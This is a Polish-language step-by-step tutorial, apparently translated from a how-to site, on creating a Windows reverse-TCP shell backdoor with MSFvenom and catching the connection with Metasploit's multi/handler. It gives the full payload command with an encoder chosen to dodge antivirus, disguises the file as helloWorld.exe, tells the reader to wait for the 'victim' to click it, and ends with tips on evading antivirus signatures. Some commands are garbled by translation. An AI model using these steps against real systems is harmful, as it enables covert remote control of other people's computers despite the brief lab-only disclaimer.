Backdoor służy do omijania mechanizmów bezpieczeństwa, często potajemnie i przeważnie w sposób niewykrywalny. Używając MSFvenom, kombinacji msfpayload i msfencode, możliwe jest stworzenie backdoora, który łączy się z napastnikiem za pomocą TCP odwróconej powłoki. Aby stworzyć backdoora, musisz zmienić sygnaturę swojego złośliwego oprogramowania, aby uniknąć oprogramowania antywirusowego. Ukończ ten projekt na parze komputerów, do których masz uprawnienia dostępu, a dzięki temu dowiesz się więcej o bezpieczeństwie komputera i działaniu tego rodzaju backdoora.
Kroki
Krok 1. Uruchom Kali i uruchom konsolę Terminal
Krok 2. Wpisz ifconfig, aby wyświetlić interfejs i sprawdź swój adres IP
Krok 3. Wpisz msfvenom -l kodery, aby wyświetlić listę koderów
Jako kodera użyjesz x86/shikata_ga_nai
Krok 4. Wpisz "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
- -a x86 --platform windows wyznacza architekturę do użycia.
- -p windows/shell/reverse_tcp wyznacza ładunki do osadzenia.
- LHOST wyznacza adres IP słuchacza.
- LPORT oznacza port nasłuchiwania.
- -b "\x00" oznacza unikanie złego znaku (bajty null).
- -e x86/shikata_ga_nai wyznacza nazwę kodera.
- -f exe > helloWorld.exe oznacza wyjście formatu.
Krok 5. Wpisz msfconsole, aby aktywować Metasploit
Teraz wygenerowałeś backdoora. Kiedy ofiara kliknie helloWorld.exe, osadzony ładunek powłoki zostanie aktywowany i nawiąże połączenie z powrotem do twojego systemu. Aby otrzymać połączenie, musisz otworzyć multi-handler w Metasploit i ustawić ładunki
Krok 6. Wpisz use exploit/multi/handler
Krok 7. Wpisz set payload windows/shell/reverse_tcp
Krok 8. Wpisz opcje show, aby sprawdzić moduł
Krok 9. Wpisz zestaw LHOST 192.168.48.129
„LHOST” oznacza adres IP słuchacza
Krok 10. Typ zestawu LPORT 4444
„LPORT” oznacza port nasłuchiwania
Krok 11. Wpisz run i poczekaj na połączenie z komputera ofiary
Krok 12. Poczekaj, aż ofiara kliknie helloWorld.exe
Następnie zostaniesz pomyślnie połączony z komputerem ofiary.
Porady
- Użycie -i w MSFvenom będzie reprezentować iteracje kodowania. Czasami więcej iteracji może pomóc ominąć oprogramowanie AV.
- Nauczyłeś się, jak generować backdoora i kodować go za pomocą MSFvenom, ale ta metoda nie będzie działać idealnie w dzisiejszych czasach w przypadku niektórych programów antywirusowych. Powodem tego są szablony wykonania w MSFvenom. Sprzedawcy AV dodali statyczny podpis tych szablonów i po prostu ich poszukaj. Rozwiązaniem tego problemu jest użycie innego szablonu wykonania lub innych narzędzi.